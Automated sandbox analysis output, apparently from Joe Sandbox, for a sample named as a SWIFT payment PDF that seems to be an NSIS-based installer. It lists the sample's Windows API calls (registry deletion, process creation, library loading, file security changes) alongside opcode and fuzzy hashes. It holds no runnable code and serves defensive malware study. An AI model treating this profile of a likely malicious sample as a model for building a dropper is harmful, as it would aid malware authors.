                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                    • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                    • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                    • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                    • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                    • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                    • CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                    • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                    • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1941528284-0
                                                                                                                                    • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                    • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                    • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                    • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                    • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                    • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                    • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                    • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                    • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                    • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                    • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                    • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                    • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                    • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                    • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                    • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • wsprintfW.USER32 ref: 00406411
                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll
                                                                                                                                    • API String ID: 2200240437-2744773210
                                                                                                                                    • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                    • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                    • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1356686001-0
                                                                                                                                    • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                    • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                    • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                    • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                      • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                      • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3585118688-0
                                                                                                                                    • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                    • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                    • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                    • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3449924974-0
                                                                                                                                    • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                    • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                    • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                      • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                    • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                    APIs
